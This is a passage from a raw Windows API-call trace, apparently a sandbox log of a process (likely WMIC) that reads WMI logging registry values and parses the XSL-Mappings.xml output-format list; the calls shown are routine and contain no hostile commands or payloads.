lpData=0x0, lpcbData=0x1df5d8*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1df5d8*=0x42) returned 0x0 [0275.392] malloc (_Size=0x86) returned 0x792d80 [0275.392] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x792d80, lpcbData=0x1df5d8*=0x42 | out: lpType=0x0, lpData=0x792d80*=0x25, lpcbData=0x1df5d8*=0x42) returned 0x0 [0275.392] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0275.392] malloc (_Size=0x42) returned 0x792e10 [0275.392] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0275.392] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1df5dc, lpcbData=0x1df5d8*=0x400 | out: lpType=0x0, lpData=0x1df5dc*=0x36, lpcbData=0x1df5d8*=0xc) returned 0x0 [0275.392] _wtol (_String="65536") returned 65536 [0275.392] free (_Block=0x792d80) [0275.392] RegCloseKey (hKey=0x0) returned 0x6 [0275.392] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1dfa6c | out: ppv=0x1dfa6c*=0x7745a8) returned 0x0 [0275.415] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x7745a8, xmlSource=0x1df9f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x1dfa58 | out: isSuccessful=0x1dfa58*=0xffff) returned 0x0 [0275.548] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x7745a8, DOMElement=0x1dfa68 | out: DOMElement=0x1dfa68*=0x776b48) returned 0x0 [0275.549] malloc (_Size=0xc) returned 0x799880 [0275.549] IXMLDOMElement:getElementsByTagName (in: This=0x776b48, tagName="XSLFORMAT", resultList=0x1dfa64 | out: resultList=0x1dfa64*=0x779ca0) returned 0x0 [0275.550] free (_Block=0x799880) [0275.550] IXMLDOMNodeList:get_length (in: This=0x779ca0, listLength=0x1dfa60 | out: listLength=0x1dfa60*=21) returned 0x0 [0275.550] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=0, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.551] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="texttable.xsl") returned 0x0 [0275.551] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.551] malloc (_Size=0xc) returned 0x799868 [0275.551] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.551] free (_Block=0x799868) [0275.551] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0275.551] malloc (_Size=0xc) returned 0x799988 [0275.552] malloc (_Size=0xc) returned 0x7999a0 [0275.552] malloc (_Size=0x18) returned 0x792a60 [0275.552] IUnknown:Release (This=0x776b88) returned 0x0 [0275.552] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.552] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.552] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=1, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.552] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="textvaluelist.xsl") returned 0x0 [0275.552] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.552] malloc (_Size=0xc) returned 0x799868 [0275.552] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.552] free (_Block=0x799868) [0275.552] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0275.552] malloc (_Size=0xc) returned 0x7997f0 [0275.552] malloc (_Size=0xc) returned 0x799970 [0275.552] SysStringLen (param_1="VALUE") returned 0x5 [0275.552] SysStringLen (param_1="TABLE") returned 0x5 [0275.552] SysStringLen (param_1="TABLE") returned 0x5 [0275.553] SysStringLen (param_1="VALUE") returned 0x5 [0275.553] malloc (_Size=0x18) returned 0x792c40 [0275.553] IUnknown:Release (This=0x776b88) returned 0x0 [0275.553] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.553] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.553] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=2, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.553] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="textvaluelist.xsl") returned 0x0 [0275.553] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.553] malloc (_Size=0xc) returned 0x799808 [0275.553] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.553] free (_Block=0x799808) [0275.553] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0275.553] malloc (_Size=0xc) returned 0x7999b8 [0275.553] malloc (_Size=0xc) returned 0x7998f8 [0275.553] SysStringLen (param_1="LIST") returned 0x4 [0275.553] SysStringLen (param_1="TABLE") returned 0x5 [0275.553] malloc (_Size=0x18) returned 0x792c60 [0275.554] IUnknown:Release (This=0x776b88) returned 0x0 [0275.554] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.554] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.554] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=3, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.554] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="rawxml.xsl") returned 0x0 [0275.554] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.554] malloc (_Size=0xc) returned 0x799820 [0275.554] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.554] free (_Block=0x799820) [0275.554] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0275.554] malloc (_Size=0xc) returned 0x799808 [0275.554] malloc (_Size=0xc) returned 0x799838 [0275.554] SysStringLen (param_1="RAWXML") returned 0x6 [0275.554] SysStringLen (param_1="TABLE") returned 0x5 [0275.554] SysStringLen (param_1="RAWXML") returned 0x6 [0275.554] SysStringLen (param_1="LIST") returned 0x4 [0275.554] SysStringLen (param_1="LIST") returned 0x4 [0275.554] SysStringLen (param_1="RAWXML") returned 0x6 [0275.554] malloc (_Size=0x18) returned 0x792a80 [0275.555] IUnknown:Release (This=0x776b88) returned 0x0 [0275.555] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.555] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.555] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=4, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.555] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="htable.xsl") returned 0x0 [0275.555] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.555] malloc (_Size=0xc) returned 0x7998b0 [0275.555] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.555] free (_Block=0x7998b0) [0275.555] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0275.555] malloc (_Size=0xc) returned 0x799820 [0275.555] malloc (_Size=0xc) returned 0x799850 [0275.555] SysStringLen (param_1="HTABLE") returned 0x6 [0275.555] SysStringLen (param_1="TABLE") returned 0x5 [0275.555] SysStringLen (param_1="HTABLE") returned 0x6 [0275.555] SysStringLen (param_1="LIST") returned 0x4 [0275.555] malloc (_Size=0x18) returned 0x792c80 [0275.555] IUnknown:Release (This=0x776b88) returned 0x0 [0275.556] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.556] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.556] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=5, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.556] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="hform.xsl") returned 0x0 [0275.556] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.556] malloc (_Size=0xc) returned 0x7998b0 [0275.556] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.556] free (_Block=0x7998b0) [0275.556] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0275.556] malloc (_Size=0xc) returned 0x799868 [0275.556] malloc (_Size=0xc) returned 0x799880 [0275.556] SysStringLen (param_1="HFORM") returned 0x5 [0275.556] SysStringLen (param_1="TABLE") returned 0x5 [0275.556] SysStringLen (param_1="HFORM") returned 0x5 [0275.556] SysStringLen (param_1="LIST") returned 0x4 [0275.556] SysStringLen (param_1="HFORM") returned 0x5 [0275.556] SysStringLen (param_1="HTABLE") returned 0x6 [0275.556] malloc (_Size=0x18) returned 0x792aa0 [0275.557] IUnknown:Release (This=0x776b88) returned 0x0 [0275.557] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.557] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.557] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=6, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.557] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="xml.xsl") returned 0x0 [0275.557] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.557] malloc (_Size=0xc) returned 0x799958 [0275.557] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.557] free (_Block=0x799958) [0275.557] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0275.557] malloc (_Size=0xc) returned 0x799898 [0275.557] malloc (_Size=0xc) returned 0x7998b0 [0275.558] SysStringLen (param_1="XML") returned 0x3 [0275.558] SysStringLen (param_1="TABLE") returned 0x5 [0275.558] SysStringLen (param_1="XML") returned 0x3 [0275.558] SysStringLen (param_1="VALUE") returned 0x5 [0275.558] SysStringLen (param_1="VALUE") returned 0x5 [0275.558] SysStringLen (param_1="XML") returned 0x3 [0275.558] malloc (_Size=0x18) returned 0x792ba0 [0275.606] IUnknown:Release (This=0x776b88) returned 0x0 [0275.606] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.606] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.606] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=7, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.607] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="mof.xsl") returned 0x0 [0275.607] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.607] malloc (_Size=0xc) returned 0x799928 [0275.607] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.607] free (_Block=0x799928) [0275.607] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0275.607] malloc (_Size=0xc) returned 0x7998c8 [0275.607] malloc (_Size=0xc) returned 0x7998e0 [0275.607] SysStringLen (param_1="MOF") returned 0x3 [0275.607] SysStringLen (param_1="TABLE") returned 0x5 [0275.607] SysStringLen (param_1="MOF") returned 0x3 [0275.607] SysStringLen (param_1="LIST") returned 0x4 [0275.607] SysStringLen (param_1="MOF") returned 0x3 [0275.607] SysStringLen (param_1="RAWXML") returned 0x6 [0275.608] SysStringLen (param_1="LIST") returned 0x4 [0275.608] SysStringLen (param_1="MOF") returned 0x3 [0275.608] malloc (_Size=0x18) returned 0x792bc0 [0275.608] IUnknown:Release (This=0x776b88) returned 0x0 [0275.608] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.608] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.608] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=8, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.608] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="csv.xsl") returned 0x0 [0275.608] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.608] malloc (_Size=0xc) returned 0x799910 [0275.608] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.608] free (_Block=0x799910) [0275.608] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0275.608] malloc (_Size=0xc) returned 0x799910 [0275.608] malloc (_Size=0xc) returned 0x799958 [0275.608] SysStringLen (param_1="CSV") returned 0x3 [0275.609] SysStringLen (param_1="TABLE") returned 0x5 [0275.609] SysStringLen (param_1="CSV") returned 0x3 [0275.609] SysStringLen (param_1="LIST") returned 0x4 [0275.609] SysStringLen (param_1="CSV") returned 0x3 [0275.609] SysStringLen (param_1="HTABLE") returned 0x6 [0275.609] SysStringLen (param_1="CSV") returned 0x3 [0275.609] SysStringLen (param_1="HFORM") returned 0x5 [0275.609] malloc (_Size=0x18) returned 0x792d00 [0275.609] IUnknown:Release (This=0x776b88) returned 0x0 [0275.609] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.609] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.609] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=9, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.609] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="texttable.xsl") returned 0x0 [0275.609] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.609] malloc (_Size=0xc) returned 0x799928 [0275.609] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.609] free (_Block=0x799928) [0275.609] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0275.609] malloc (_Size=0xc) returned 0x799928 [0275.609] malloc (_Size=0xc) returned 0x79ac48 [0275.609] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.610] SysStringLen (param_1="TABLE") returned 0x5 [0275.610] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.610] SysStringLen (param_1="VALUE") returned 0x5 [0275.610] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.610] SysStringLen (param_1="XML") returned 0x3 [0275.610] SysStringLen (param_1="XML") returned 0x3 [0275.610] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.610] malloc (_Size=0x18) returned 0x792ac0 [0275.610] IUnknown:Release (This=0x776b88) returned 0x0 [0275.610] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.610] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.610] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=10, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.610] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="texttable.xsl") returned 0x0 [0275.610] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.610] malloc (_Size=0xc) returned 0x79acf0 [0275.610] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.610] free (_Block=0x79acf0) [0275.610] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0275.610] malloc (_Size=0xc) returned 0x79ac90 [0275.611] malloc (_Size=0xc) returned 0x79ac78 [0275.611] SysStringLen (param_1="texttablewsys") returned 0xd [0275.611] SysStringLen (param_1="TABLE") returned 0x5 [0275.611] SysStringLen (param_1="texttablewsys") returned 0xd [0275.611] SysStringLen (param_1="XML") returned 0x3 [0275.611] SysStringLen (param_1="texttablewsys") returned 0xd [0275.611] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.611] SysStringLen (param_1="XML") returned 0x3 [0275.611] SysStringLen (param_1="texttablewsys") returned 0xd [0275.611] malloc (_Size=0x18) returned 0x792be0 [0275.611] IUnknown:Release (This=0x776b88) returned 0x0 [0275.611] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.611] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.611] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=11, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.611] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="texttable.xsl") returned 0x0 [0275.611] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.611] malloc (_Size=0xc) returned 0x79ab40 [0275.611] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.611] free (_Block=0x79ab40) [0275.612] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0275.612] malloc (_Size=0xc) returned 0x79ab28 [0275.612] malloc (_Size=0xc) returned 0x79ad38 [0275.612] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.612] SysStringLen (param_1="TABLE") returned 0x5 [0275.612] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.612] SysStringLen (param_1="XML") returned 0x3 [0275.612] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.612] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.612] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.612] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.612] malloc (_Size=0x18) returned 0x792b20 [0275.612] IUnknown:Release (This=0x776b88) returned 0x0 [0275.612] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.612] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.612] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=12, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.612] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="texttable.xsl") returned 0x0 [0275.612] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.612] malloc (_Size=0xc) returned 0x79acd8 [0275.612] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.613] free (_Block=0x79acd8) [0275.613] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0275.613] malloc (_Size=0xc) returned 0x79ad20 [0275.613] malloc (_Size=0xc) returned 0x79adf8 [0275.613] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0275.613] SysStringLen (param_1="TABLE") returned 0x5 [0275.613] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0275.613] SysStringLen (param_1="XML") returned 0x3 [0275.613] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0275.613] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.613] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0275.613] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.613] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.613] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0275.613] malloc (_Size=0x18) returned 0x7929e0 [0275.613] IUnknown:Release (This=0x776b88) returned 0x0 [0275.613] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.613] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.613] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=13, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.613] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="texttable.xsl") returned 0x0 [0275.613] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.613] malloc (_Size=0xc) returned 0x79ab70 [0275.614] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.614] free (_Block=0x79ab70) [0275.614] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0275.614] malloc (_Size=0xc) returned 0x79ab10 [0275.614] malloc (_Size=0xc) returned 0x79ad98 [0275.614] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.614] SysStringLen (param_1="TABLE") returned 0x5 [0275.614] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.614] SysStringLen (param_1="XML") returned 0x3 [0275.614] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.614] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.614] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.614] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.614] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.614] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.614] malloc (_Size=0x18) returned 0x792ca0 [0275.614] IUnknown:Release (This=0x776b88) returned 0x0 [0275.614] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.614] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.614] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=14, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.614] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="texttable.xsl") returned 0x0 [0275.615] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.615] malloc (_Size=0xc) returned 0x79ad68 [0275.615] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.615] free (_Block=0x79ad68) [0275.615] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0275.615] malloc (_Size=0xc) returned 0x79acc0 [0275.615] malloc (_Size=0xc) returned 0x79ab40 [0275.615] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0275.615] SysStringLen (param_1="TABLE") returned 0x5 [0275.615] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0275.615] SysStringLen (param_1="XML") returned 0x3 [0275.615] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0275.615] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.615] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0275.615] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.615] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0275.615] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.616] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.616] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0275.616] malloc (_Size=0x18) returned 0x792cc0 [0275.616] IUnknown:Release (This=0x776b88) returned 0x0 [0275.616] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.616] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.616] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=15, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.616] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="htable.xsl") returned 0x0 [0275.616] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.616] malloc (_Size=0xc) returned 0x79ad50 [0275.616] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.616] free (_Block=0x79ad50) [0275.616] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0275.616] malloc (_Size=0xc) returned 0x79adb0 [0275.616] malloc 